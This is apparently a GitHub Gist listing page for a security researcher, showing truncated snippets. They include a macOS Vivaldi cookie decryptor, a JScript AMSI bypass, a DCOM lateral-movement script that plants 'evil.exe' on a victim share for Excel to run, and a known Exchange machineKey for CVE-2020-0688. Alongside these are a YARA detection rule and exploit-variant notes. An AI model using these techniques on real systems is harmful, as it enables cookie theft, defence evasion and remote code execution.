Skip to content

Instantly share code, notes, and snippets.

rxwx /
Created Apr 15, 2020
Get Office version that last saved the file
import re
import sys
versions = {
0x00: 'Excel 97',
0x01: 'Excel 2000',
0x02: 'Excel 2002',
0x03: 'Office Excel 2003',
0x04: 'Office Excel 2007',
0x06: 'Excel 2010',
rxwx /
Last active May 14, 2020
Decrypt Vivaldi Cookies on MacOS
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
import sqlite3
import os
import shutil
def clean(x):
return x[:-ord(x[-1])]
# Make a copy of the cookie file
View CVE-2020-0688.config
<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />
rxwx /
Created Aug 13, 2019
Pulse Secure Version Scanner
import requests
import sys
import re
HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"}
if len(sys.argv) != 2:
print " Usage: python <target ip/domain>"
rxwx / bypass.js
Created Aug 16, 2018
AMSIEnable Bypass in JScript
View bypass.js
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
var AmsiEnable = sh.RegRead(key);
throw new Error(1, '');
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
rxwx / ziptool.ps1
Created May 4, 2018
File Zip in native PowerShell with .NET 3.0
View ziptool.ps1
Author: Rich Warren
Based on original c# code by Jon Galloway:
Tool for creating a Zip file in native Powershell with .NET 3.0 only.
rxwx /
Last active Feb 21, 2020
Notes on new Equation Editor Exploit, CVE-2018-0802 variant

New Equation Editor Exploit Variant

On 19/03/18, a large number of RTF samples started triggering one of my "suspicious" RTF rules. Looking at the samples, they all appeared to have around 2-4 detections, which seemed curious. This was confirmed by Mitja Kolsek to be a new variant of CVE-2018-0802, which is already covered by 0patch, and patched by Microsoft in January 2018. However, the technique is not unique to CVE-2018-0802 and can be seen used to exploit CVE-2017-11882 aswell.

This was also seen by Shiao Qu. There is a [blog post](https://www.drop

rxwx / CVE_2017_8759_CRLF.yara
Created Sep 17, 2017
Yara rule to detect attempts to exploit .NET CLRF injection in a WSDL file (aka CVE-2017-8759)
View CVE_2017_8759_CRLF.yara
rule CVE_2017_8759_CRLF {
description = "Detects attempts to exploit CVE-2017-8759 CRLF injection in WSDL file"
author = "Rich Warren @buffaloverflow"
reference = ""
date = "2017-09-17"
$s1 = /<soap:address location=\";\r?\n/ ascii wide nocase
rxwx / foxprow.ps1
Last active Sep 14, 2017
DCOM binary planting via Excel.Application.ActivateMicrosoftApp
View foxprow.ps1
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", ""))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
# excel executes your binary :)
You can’t perform that action at this time.